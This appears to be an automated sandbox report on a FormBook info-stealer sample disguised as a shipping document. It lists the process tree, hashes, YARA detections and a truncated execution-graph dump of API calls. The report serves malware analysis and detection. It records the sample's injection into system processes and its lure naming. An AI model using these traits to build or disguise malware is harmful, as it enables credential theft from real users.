                  Start time:05:10:08
                  Start date:14/09/2024
                  Path:C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
                  Imagebase:0xe00000
                  File size:1'280'512 bytes
                  MD5 hash:E57F3CDD911CBAF924BF1E6E7DCC7795
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:1
                  Start time:05:10:09
                  Start date:14/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
                  Imagebase:0x330000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:05:10:43
                  Start date:14/09/2024
                  Path:C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe"
                  Imagebase:0xe70000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:6
                  Start time:05:10:45
                  Start date:14/09/2024
                  Path:C:\Windows\SysWOW64\netbtugc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                  Imagebase:0x820000
                  File size:22'016 bytes
                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:false

                  General

                  Target ID:8
                  Start time:05:10:58
                  Start date:14/09/2024
                  Path:C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe"
                  Imagebase:0xe70000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:9
                  Start time:05:11:15
                  Start date:14/09/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:6.1%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:84
                    execution_graph 96604 e40180 96616 e1fac4 96604->96616 96606 e40196 96607 e40217 96606->96607 96608 e401ac 96606->96608 96625 e0fe40 96607->96625 96705 e09fbd 60 API calls 96608->96705 96611 e401eb 96615 e4020b Mailbox 96611->96615 96706 e683f8 59 API calls Mailbox 96611->96706 96613 e40c10 Mailbox 96615->96613 96707 e69ed4 89 API calls 4 library calls 96615->96707 96617 e1fad0 96616->96617 96618 e1fae2 96616->96618 96708 e09e9c 60 API calls Mailbox 96617->96708 96620 e1fb11 96618->96620 96621 e1fae8 96618->96621 96719 e09e9c 60 API calls Mailbox 96620->96719 96709 e20f36 96621->96709 96624 e1fada 96624->96606 96748 e082e0 96625->96748 96627 e0fe9d 96629 e44a86 96627->96629 96674 e10856 96627->96674 96753 e0f394 96627->96753 96870 e69ed4 89 API calls 4 library calls 96629->96870 96632 e44a9b 96633 e44be6 96633->96632 96637 e0ffac 96633->96637 96876 e7a3ee 85 API calls Mailbox 96633->96876 96634 e0ff9e 96634->96633 96634->96637 96874 e56a42 59 API calls 2 library calls 96634->96874 96635 e10677 96644 e20f36 Mailbox 59 API calls 96635->96644 96636 e20f36 59 API calls Mailbox 96667 e0ff33 96636->96667 96645 e44c52 96637->96645 96691 e44eac 96637->96691 96757 e084dc 96637->96757 96638 e44b30 96638->96632 96872 e69ed4 89 API calls 4 library calls 96638->96872 96641 e44ba1 96875 e56363 59 API calls 2 library calls 96641->96875 96653 e106a5 _memmove 96644->96653 96654 e44c70 96645->96654 96878 e08720 59 API calls Mailbox 96645->96878 96647 e44aae 96647->96638 96871 e0f803 341 API calls 96647->96871 96650 e44bc4 96656 e0a000 341 API calls 96650->96656 96651 e44c0b Mailbox 96651->96637 96877 e56a42 59 API calls 2 library calls 96651->96877 96661 e20f36 Mailbox 59 API calls 96653->96661 96658 e44c81 96654->96658 96879 e08720 59 API calls Mailbox 96654->96879 96655 e10004 96659 e10092 96655->96659 96660 e44e2f 96655->96660 96699 e102d9 Mailbox _memmove 96655->96699 96656->96633 96658->96699 96880 e5631f 59 API calls Mailbox 96658->96880 96664 e20f36 Mailbox 59 API calls 96659->96664 96889 e69b90 60 API calls 96660->96889 96703 e10266 _memmove 96661->96703 96668 e10099 96664->96668 96667->96632 96667->96634 96667->96635 96667->96636 96667->96647 96667->96653 96677 e44b65 96667->96677 96845 e0a000 96667->96845 96668->96674 96764 e10b30 96668->96764 96670 e44da6 96671 e0a000 341 API calls 96670->96671 96673 e44de0 96671->96673 96673->96632 96884 e08620 96673->96884 96869 e69ed4 89 API calls 4 library calls 96674->96869 96676 e10112 96676->96653 96676->96674 96683 e10146 96676->96683 96873 e69ed4 89 API calls 4 library calls 96677->96873 96681 e44e0b 96888 e69ed4 89 API calls 4 library calls 96681->96888 96689 e10167 96683->96689 96890 e081a7 96683->96890 96688 e104f8 96688->96615 96689->96674 96690 e44e7d 96689->96690 96694 e101ac 96689->96694 96894 e09e9c 60 API calls Mailbox 96690->96894 96691->96632 96895 e69ed4 89 API calls 4 library calls 96691->96895 96693 e20f36 59 API calls Mailbox 96693->96699 96694->96674 96694->96691 96695 e10238 96694->96695 96841 e09e9c 60 API calls Mailbox 96695->96841 96697 e44d75 96701 e20f36 Mailbox 59 API calls 96697->96701 96698 e1024b 96698->96674 96842 e0843f 59 API calls Mailbox 96698->96842 96699->96670 96699->96674 96699->96681 96699->96688 96699->96693 96699->96697 96843 e088a0 68 API calls __cinit 96699->96843 96844 e087c0 68 API calls 96699->96844 96881 e659de 68 API calls 96699->96881 96882 e08b13 69 API calls Mailbox 96699->96882 96883 e09e9c 60 API calls Mailbox 96699->96883 96701->96670 96703->96699 96704 e102c2 96703->96704 96868 e09df0 59 API calls Mailbox 96703->96868 96704->96615 96705->96611 96706->96615 96707->96613 96708->96624 96712 e20f3e 96709->96712 96711 e20f58 96711->96624 96712->96711 96714 e20f5c std::exception::exception 96712->96714 96720 e2588c 96712->96720 96737 e23521 DecodePointer 96712->96737 96738 e2871b RaiseException 96714->96738 96716 e20f86 96739 e28651 58 API calls _free 96716->96739 96718 e20f98 96718->96624 96719->96624 96721 e25907 96720->96721 96729 e25898 96720->96729 96746 e23521 DecodePointer 96721->96746 96723 e2590d 96747 e28ca8 58 API calls __getptd_noexit 96723->96747 96726 e258cb RtlAllocateHeap 96727 e258ff 96726->96727 96726->96729 96727->96712 96729->96726 96730 e258f3 96729->96730 96731 e258a3 96729->96731 96735 e258f1 96729->96735 96743 e23521 DecodePointer 96729->96743 96744 e28ca8 58 API calls __getptd_noexit 96730->96744 96731->96729 96740 e2a2eb 58 API calls 2 library calls 96731->96740 96741 e2a348 58 API calls 8 library calls 96731->96741 96742 e2321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 96731->96742 96745 e28ca8 58 API calls __getptd_noexit 96735->96745 96737->96712 96738->96716 96739->96718 96740->96731 96741->96731 96743->96729 96744->96735 96745->96727 96746->96723 96747->96727 96749 e082ef 96748->96749 96752 e0830a 96748->96752 96896 e07faf 96749->96896 96751 e082f7 CharUpperBuffW 96751->96752 96752->96627 96754 e0f3b1 96753->96754 96756 e0f3d2 96754->96756 96900 e69ed4 89 API calls 4 library calls 96754->96900 96756->96667 96758 e3f116 96757->96758 96759 e084ed 96757->96759 96760 e20f36 Mailbox 59 API calls 96759->96760 96761 e084f4 96760->96761 96762 e08515 96761->96762 96901 e08794 59 API calls Mailbox 96761->96901 96762->96645 96762->96655 96765 e4501c 96764->96765 96776 e10b55 96764->96776 96963 e69ed4 89 API calls 4 library calls 96765->96963 96767 e10e5a 96767->96676 96769 e11044 96769->96767 96771 e11051 96769->96771 96961 e111f3 341 API calls Mailbox 96771->96961 96772 e10bab PeekMessageW 96839 e10b65 Mailbox 96772->96839 96774 e11058 LockWindowUpdate DestroyWindow GetMessageW 96774->96767 96778 e1108a 96774->96778 96776->96839 96964 e09fbd 60 API calls 96776->96964 96965 e5669f 341 API calls 96776->96965 96777 e451da Sleep 96777->96839 96781 e45fb1 TranslateMessage DispatchMessageW GetMessageW 96778->96781 96779 e10e44 96779->96767 96960 e111d0 10 API calls Mailbox 96779->96960 96781->96781 96782 e45fe1 96781->96782 96782->96767 96783 e10fa3 PeekMessageW 96783->96839 96784 e11005 TranslateMessage DispatchMessageW 96784->96783 96785 e450a9 TranslateAcceleratorW 96785->96783 96785->96839 96787 e10e73 timeGetTime 96787->96839 96788 e45b78 WaitForSingleObject 96791 e45b95 GetExitCodeProcess CloseHandle 96788->96791 96788->96839 96789 e081a7 59 API calls 96789->96839 96823 e110f5 96791->96823 96792 e10fbf Sleep 96825 e10fd0 Mailbox 96792->96825 96793 e45e51 Sleep 96793->96825 96795 e20f36 59 API calls Mailbox 96795->96839 96797 e2034a timeGetTime 96797->96825 96798 e110ae timeGetTime 96962 e09fbd 60 API calls 96798->96962 96801 e45ee8 GetExitCodeProcess 96803 e45f14 CloseHandle 96801->96803 96804 e45efe WaitForSingleObject 96801->96804 96803->96825 96804->96803 96804->96839 96807 e85f8e 110 API calls 96807->96825 96808 e0b93d 109 API calls 96808->96825 96809 e09fbd 60 API calls 96809->96839 96810 e45bcd 96810->96823 96811 e45f70 Sleep 96811->96839 96812 e453d1 Sleep 96812->96839 96818 e0a000 314 API calls 96818->96839 96821 e0fe40 314 API calls 96821->96839 96823->96676 96825->96797 96825->96801 96825->96807 96825->96808 96825->96810 96825->96811 96825->96812 96825->96823 96825->96839 96990 e077c7 96825->96990 96995 e62700 60 API calls 96825->96995 96996 e09fbd 60 API calls 96825->96996 96997 e07f41 96825->96997 97001 e08b13 69 API calls Mailbox 96825->97001 97002 e0b89c 341 API calls 96825->97002 97003 e56830 60 API calls 96825->97003 97004 e652eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96825->97004 97005 e63c99 66 API calls Mailbox 96825->97005 96826 e69ed4 89 API calls 96826->96839 96828 e08620 69 API calls 96828->96839 96829 e08b13 69 API calls 96829->96839 96830 e09df0 59 API calls Mailbox 96830->96839 96831 e563f2 59 API calls Mailbox 96831->96839 96833 e07f41 59 API calls 96833->96839 96834 e4592e VariantClear 96834->96839 96835 e459c4 VariantClear 96835->96839 96836 e571e5 59 API calls 96836->96839 96837 e08e34 59 API calls Mailbox 96837->96839 96838 e45772 VariantClear 96838->96839 96839->96772 96839->96777 96839->96779 96839->96783 96839->96784 96839->96785 96839->96787 96839->96788 96839->96789 96839->96792 96839->96793 96839->96795 96839->96798 96839->96809 96839->96818 96839->96821 96839->96823 96839->96825 96839->96826 96839->96828 96839->96829 96839->96830 96839->96831 96839->96833 96839->96834 96839->96835 96839->96836 96839->96837 96839->96838 96840 e0b89c 314 API calls 96839->96840 96902 e0e580 96839->96902 96909 e0e800 96839->96909 96940 e0f5c0 96839->96940 96959 e031ce IsDialogMessageW GetClassLongW 96839->96959 96966 e86081 59 API calls 96839->96966 96967 e69abe 59 API calls Mailbox 96839->96967 96968 e5d801 59 API calls 96839->96968 96969 e09997 96839->96969 96987 e56363 59 API calls 2 library calls 96839->96987 96988 e08561 59 API calls 96839->96988 96989 e0843f 59 API calls Mailbox 96839->96989 96840->96839 96841->96698 96842->96703 96843->96699 96844->96699 96846 e0a01f 96845->96846 96863 e0a04d Mailbox 96845->96863 96847 e20f36 Mailbox 59 API calls 96846->96847 96847->96863 96848 e22ec0 67 API calls __cinit 96848->96863 96849 e0b5d5 96850 e081a7 59 API calls 96849->96850 96862 e0a1b7 96850->96862 96851 e571e5 59 API calls 96851->96863 96854 e20f36 59 API calls Mailbox 96854->96863 96855 e081a7 59 API calls 96855->96863 96857 e403ae 98141 e69ed4 89 API calls 4 library calls 96857->98141 96859 e077c7 59 API calls 96859->96863 96861 e403bd 96861->96667 96862->96667 96863->96848 96863->96849 96863->96851 96863->96854 96863->96855 96863->96857 96863->96859 96863->96862 96864 e40d2f 96863->96864 96866 e0b5da 96863->96866 96867 e0a6ba 96863->96867 98139 e0ca20 341 API calls 2 library calls 96863->98139 98140 e0ba60 60 API calls Mailbox 96863->98140 98143 e69ed4 89 API calls 4 library calls 96864->98143 98144 e69ed4 89 API calls 4 library calls 96866->98144 98142 e69ed4 89 API calls 4 library calls 96867->98142 96868->96703 96869->96629 96870->96632 96871->96638 96872->96632 96873->96632 96874->96641 96875->96650 96876->96651 96877->96651 96878->96654 96879->96658 96880->96699 96881->96699 96882->96699 96883->96699 96885 e0862b 96884->96885 96887 e08652 96885->96887 98145 e08b13 69 API calls Mailbox 96885->98145 96887->96681 96888->96632 96889->96683 96891 e081b2 96890->96891 96892 e081ba 96890->96892 96893 e080d7 59 API calls 96891->96893 96892->96689 96893->96892 96894->96691 96895->96632 96897 e07fc2 96896->96897 96899 e07fbf _memmove 96896->96899 96898 e20f36 Mailbox 59 API calls 96897->96898 96898->96899 96899->96751 96900->96756 96901->96762 96903 e0e59d 96902->96903 96905 e0e5b1 96902->96905 97006 e0e060 341 API calls 2 library calls 96903->97006 97007 e69ed4 89 API calls 4 library calls 96905->97007 96906 e0e5a8 96906->96839 96908 e43dfd 96908->96908 96910 e0e835 96909->96910 96911 e43e02 96910->96911 96914 e0e89f 96910->96914 96918 e0e8f9 96910->96918 96912 e0a000 341 API calls 96911->96912 96913 e43e17 96912->96913 96936 e0ead0 Mailbox 96913->96936 97012 e69ed4 89 API calls 4 library calls 96913->97012 96917 e077c7 59 API calls 96914->96917 96914->96918 96915 e077c7 59 API calls 96915->96918 96919 e43e5d 96917->96919 96918->96915 96920 e22ec0 __cinit 67 API calls 96918->96920 96922 e43e7f 96918->96922 96926 e0eaba 96918->96926 96918->96936 97013 e22ec0 96919->97013 96920->96918 96922->96839 96923 e69ed4 89 API calls 96923->96936 96924 e08620 69 API calls 96924->96936 96926->96936 97016 e69ed4 89 API calls 4 library calls 96926->97016 96928 e0f2f5 97020 e69ed4 89 API calls 4 library calls 96928->97020 96929 e0a000 341 API calls 96929->96936 96932 e4417e 96932->96839 96933 e08ea0 59 API calls 96933->96936 96936->96923 96936->96924 96936->96928 96936->96929 96936->96933 96939 e0ebd8 96936->96939 97008 e080d7 96936->97008 97017 e571e5 59 API calls 96936->97017 97018 e7c6d7 341 API calls 96936->97018 97019 e7b651 341 API calls Mailbox 96936->97019 97021 e09df0 59 API calls Mailbox 96936->97021 97022 e794db 341 API calls Mailbox 96936->97022 96939->96839 96941 e0f7b0 96940->96941 96942 e0f61a 96940->96942 96945 e07f41 59 API calls 96941->96945 96943 e44777 96942->96943 96944 e0f626 96942->96944 97195 e7bd80 96943->97195 97193 e0f3f0 341 API calls 2 library calls 96944->97193 96952 e0f6ec Mailbox 96945->96952 96948 e0f790 96948->96839 96949 e44785 96949->96948 97235 e69ed4 89 API calls 4 library calls 96949->97235 96951 e0f65d 96951->96948 96951->96949 96951->96952 97101 e7e037 96952->97101 97104 e6cc06 96952->97104 97184 e63c7b 96952->97184 97187 e04faa 96952->97187 96954 e0f743 96954->96948 97194 e09df0 59 API calls Mailbox 96954->97194 96959->96839 96960->96769 96961->96774 96962->96839 96963->96776 96964->96776 96965->96776 96966->96839 96967->96839 96968->96839 96970 e099b1 96969->96970 96971 e099ab 96969->96971 96972 e3f92c __i64tow 96970->96972 96973 e099f9 96970->96973 96974 e099b7 __itow 96970->96974 96978 e3f833 96970->96978 96971->96839 98137 e23818 83 API calls 4 library calls 96973->98137 96976 e20f36 Mailbox 59 API calls 96974->96976 96979 e099d1 96976->96979 96980 e20f36 Mailbox 59 API calls 96978->96980 96985 e3f8ab Mailbox _wcscpy 96978->96985 96979->96971 96981 e07f41 59 API calls 96979->96981 96982 e3f878 96980->96982 96981->96971 96983 e20f36 Mailbox 59 API calls 96982->96983 96984 e3f89e 96983->96984 96984->96985 96986 e07f41 59 API calls 96984->96986 98138 e23818 83 API calls 4 library calls 96985->98138 96986->96985 96987->96839 96988->96839 96989->96839 96991 e20f36 Mailbox 59 API calls 96990->96991 96992 e077e8 96991->96992 96993 e20f36 Mailbox 59 API calls 96992->96993 96994 e077f6 96993->96994 96994->96825 96995->96825 96996->96825 96998 e07f50 __wsetenvp _memmove 96997->96998 96999 e20f36 Mailbox 59 API calls 96998->96999 97000 e07f8e 96999->97000 97000->96825 97001->96825 97002->96825 97003->96825 97004->96825 97005->96825 97006->96906 97007->96908 97009 e080fa _memmove 97008->97009 97010 e080e7 97008->97010 97009->96936 97010->97009 97011 e20f36 Mailbox 59 API calls 97010->97011 97011->97009 97012->96936 97023 e22dc4 97013->97023 97015 e22ecb 97015->96918 97016->96936 97017->96936 97018->96936 97019->96936 97020->96932 97021->96936 97022->96936 97024 e22dd0 __setmode 97023->97024 97031 e23397 97024->97031 97030 e22df7 __setmode 97030->97015 97048 e29d8b 97031->97048 97033 e22dd9 97034 e22e08 DecodePointer DecodePointer 97033->97034 97035 e22de5 97034->97035 97036 e22e35 97034->97036 97045 e22e02 97035->97045 97036->97035 97094 e28924 59 API calls 2 library calls 97036->97094 97038 e22e98 EncodePointer EncodePointer 97038->97035 97039 e22e47 97039->97038 97040 e22e6c 97039->97040 97095 e289e4 61 API calls 2 library calls 97039->97095 97040->97035 97043 e22e86 EncodePointer 97040->97043 97096 e289e4 61 API calls 2 library calls 97040->97096 97043->97038 97044 e22e80 97044->97035 97044->97043 97097 e233a0 97045->97097 97049 e29daf EnterCriticalSection 97048->97049 97050 e29d9c 97048->97050 97049->97033 97055 e29e13 97050->97055 97052 e29da2 97052->97049 97079 e23235 58 API calls 3 library calls 97052->97079 97056 e29e1f __setmode 97055->97056 97057 e29e40 97056->97057 97058 e29e28 97056->97058 97067 e29e61 __setmode 97057->97067 97083 e2899d 58 API calls 2 library calls 97057->97083 97080 e2a2eb 58 API calls 2 library calls 97058->97080 97060 e29e2d 97081 e2a348 58 API calls 8 library calls 97060->97081 97063 e29e55 97065 e29e6b 97063->97065 97066 e29e5c 97063->97066 97064 e29e34 97082 e2321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97064->97082 97068 e29d8b __lock 58 API calls 97065->97068 97084 e28ca8 58 API calls __getptd_noexit 97066->97084 97067->97052 97071 e29e72 97068->97071 97073 e29e97 97071->97073 97074 e29e7f 97071->97074 97086 e22ed5 97073->97086 97085 e29fab InitializeCriticalSectionAndSpinCount 97074->97085 97077 e29e8b 97092 e29eb3 LeaveCriticalSection _doexit 97077->97092 97080->97060 97081->97064 97083->97063 97084->97067 97085->97077 97087 e22ede RtlFreeHeap 97086->97087 97091 e22f07 __dosmaperr 97086->97091 97088 e22ef3 97087->97088 97087->97091 97093 e28ca8 58 API calls __getptd_noexit 97088->97093 97090 e22ef9 GetLastError 97090->97091 97091->97077 97092->97067 97093->97090 97094->97039 97095->97040 97096->97044 97100 e29ef5 LeaveCriticalSection 97097->97100 97099 e22e07 97099->97030 97100->97099 97236 e7cbf1 97101->97236 97103 e7e047 97103->96954 97105 e077c7 59 API calls 97104->97105 97106 e6cc3b 97105->97106 97107 e077c7 59 API calls 97106->97107 97108 e6cc44 97107->97108 97109 e6cc58 97108->97109 97564 e09c9c 59 API calls 97108->97564 97111 e09997 84 API calls 97109->97111 97112 e6cc75 97111->97112 97113 e6cd76 97112->97113 97114 e6cc97 97112->97114 97120 e6cda6 Mailbox 97112->97120 97368 e04f3d 97113->97368 97115 e09997 84 API calls 97114->97115 97117 e6cca3 97115->97117 97121 e081a7 59 API calls 97117->97121 97119 e6cda2 97119->97120 97123 e077c7 59 API calls 97119->97123 97120->96954 97124 e6ccaf 97121->97124 97122 e04f3d 136 API calls 97122->97119 97125 e6cdd7 97123->97125 97127 e6ccf5 97124->97127 97128 e6ccc3 97124->97128 97126 e077c7 59 API calls 97125->97126 97129 e6cde0 97126->97129 97131 e09997 84 API calls 97127->97131 97130 e081a7 59 API calls 97128->97130 97132 e077c7 59 API calls 97129->97132 97133 e6ccd3 97130->97133 97134 e6cd02 97131->97134 97135 e6cde9 97132->97135 97565 e07e0b 97133->97565 97137 e081a7 59 API calls 97134->97137 97138 e077c7 59 API calls 97135->97138 97141 e6cd0e 97137->97141 97139 e6cdf2 97138->97139 97142 e09997 84 API calls 97139->97142 97572 e64ad8 GetFileAttributesW 97141->97572 97146 e6cdff 97142->97146 97143 e09997 84 API calls 97147 e6cce9 97143->97147 97145 e6cd17 97148 e6cd2a 97145->97148 97151 e07b52 59 API calls 97145->97151 97392 e046f9 97146->97392 97150 e07c8e 59 API calls 97147->97150 97153 e09997 84 API calls 97148->97153 97156 e6cd30 97148->97156 97150->97127 97151->97148 97152 e6ce1a 97443 e07b52 97152->97443 97155 e6cd57 97153->97155 97573 e63833 75 API calls Mailbox 97155->97573 97156->97120 97159 e6ce5d 97161 e081a7 59 API calls 97159->97161 97160 e07b52 59 API calls 97163 e6ce3a 97160->97163 97162 e6ce6b 97161->97162 97446 e07c8e 97162->97446 97163->97159 97574 e07d2c 97163->97574 97167 e07c8e 59 API calls 97169 e6ce87 97167->97169 97168 e6ce4f 97170 e07d2c 59 API calls 97168->97170 97171 e07c8e 59 API calls 97169->97171 97170->97159 97172 e6ce95 97171->97172 97173 e09997 84 API calls 97172->97173 97174 e6cea1 97173->97174 97455 e640b2 97174->97455 97176 e6ceb2 97177 e63c7b 3 API calls 97176->97177 97178 e6cebc 97177->97178 97179 e09997 84 API calls 97178->97179 97182 e6ceed 97178->97182 97180 e6ceda 97179->97180 97509 e691fe 97180->97509 97183 e04faa 84 API calls 97182->97183 97183->97120 98125 e6449b GetFileAttributesW 97184->98125 97188 e04fb4 97187->97188 97189 e04fbb 97187->97189 97190 e25516 __fcloseall 83 API calls 97188->97190 97191 e04fca 97189->97191 97192 e04fdb FreeLibrary 97189->97192 97190->97189 97191->96954 97192->97191 97193->96951 97194->96954 97196 e7bdc5 97195->97196 97197 e7bdab 97195->97197 98130 e7a328 59 API calls Mailbox 97196->98130 98129 e69ed4 89 API calls 4 library calls 97197->98129 97200 e7bdd0 97201 e0a000 340 API calls 97200->97201 97202 e7be31 97201->97202 97203 e7bec3 97202->97203 97206 e7be72 97202->97206 97228 e7bdbd Mailbox 97202->97228 97204 e7bf19 97203->97204 97205 e7bec9 97203->97205 97207 e09997 84 API calls 97204->97207 97204->97228 98132 e679c3 59 API calls 97205->98132 98131 e67388 59 API calls Mailbox 97206->98131 97209 e7bf2b 97207->97209 97212 e07faf 59 API calls 97209->97212 97210 e7beec 98133 e05ea1 59 API calls Mailbox 97210->98133 97213 e7bf4f CharUpperBuffW 97212->97213 97218 e7bf69 97213->97218 97215 e7bea2 97217 e0f5c0 340 API calls 97215->97217 97216 e7bef4 Mailbox 97221 e0fe40 340 API calls 97216->97221 97217->97228 97219 e7bf70 97218->97219 97220 e7bfbc 97218->97220 98134 e67388 59 API calls Mailbox 97219->98134 97222 e09997 84 API calls 97220->97222 97221->97228 97223 e7bfc4 97222->97223 98135 e09fbd 60 API calls 97223->98135 97226 e7bf9e 97227 e0f5c0 340 API calls 97226->97227 97227->97228 97228->96949 97229 e7bfce 97229->97228 97230 e09997 84 API calls 97229->97230 97231 e7bfe9 97230->97231 98136 e05ea1 59 API calls Mailbox 97231->98136 97233 e7bff9 97234 e0fe40 340 API calls 97233->97234 97234->97228 97235->96948 97237 e09997 84 API calls 97236->97237 97238 e7cc2e 97237->97238 97262 e7cc75 Mailbox 97238->97262 97274 e7d8b9 97238->97274 97240 e7cecd 97241 e7d042 97240->97241 97245 e7cedb 97240->97245 97324 e7d9dc 92 API calls Mailbox 97241->97324 97244 e7d051 97244->97245 97246 e7d05d 97244->97246 97287 e7ca82 97245->97287 97246->97262 97247 e09997 84 API calls 97264 e7ccc6 Mailbox 97247->97264 97252 e7cf14 97302 e20d88 97252->97302 97255 e7cf47 97309 e0942e 97255->97309 97256 e7cf2e 97308 e69ed4 89 API calls 4 library calls 97256->97308 97259 e7cf39 GetCurrentProcess TerminateProcess 97259->97255 97262->97103 97264->97240 97264->97247 97264->97262 97306 e6f656 59 API calls 2 library calls 97264->97306 97307 e7d0f3 61 API calls 2 library calls 97264->97307 97266 e7d0b8 97266->97262 97268 e7d0cc FreeLibrary 97266->97268 97267 e7cf7f 97321 e7d75d 107 API calls _free 97267->97321 97268->97262 97273 e7cf90 97273->97266 97322 e08ea0 59 API calls Mailbox 97273->97322 97323 e09e9c 60 API calls Mailbox 97273->97323 97325 e7d75d 107 API calls _free 97273->97325 97275 e07faf 59 API calls 97274->97275 97276 e7d8d4 CharLowerBuffW 97275->97276 97326 e5f479 97276->97326 97280 e077c7 59 API calls 97281 e7d90d 97280->97281 97333 e079ab 97281->97333 97283 e7d924 97346 e07e8c 97283->97346 97285 e7d930 Mailbox 97286 e7d96c Mailbox 97285->97286 97350 e7d0f3 61 API calls 2 library calls 97285->97350 97286->97264 97288 e7ca9d 97287->97288 97292 e7caf2 97287->97292 97289 e20f36 Mailbox 59 API calls 97288->97289 97290 e7cabf 97289->97290 97291 e20f36 Mailbox 59 API calls 97290->97291 97290->97292 97291->97290 97293 e7db64 97292->97293 97294 e7db87 _strcat _wcscpy __wsetenvp 97293->97294 97295 e7dd8d Mailbox 97293->97295 97294->97295 97296 e09d46 59 API calls 97294->97296 97297 e09c9c 59 API calls 97294->97297 97298 e09cf8 59 API calls 97294->97298 97299 e09997 84 API calls 97294->97299 97300 e2588c 58 API calls __crtGetStringTypeA_stat 97294->97300 97357 e6592e 61 API calls 2 library calls 97294->97357 97295->97252 97296->97294 97297->97294 97298->97294 97299->97294 97300->97294 97304 e20d9d 97302->97304 97303 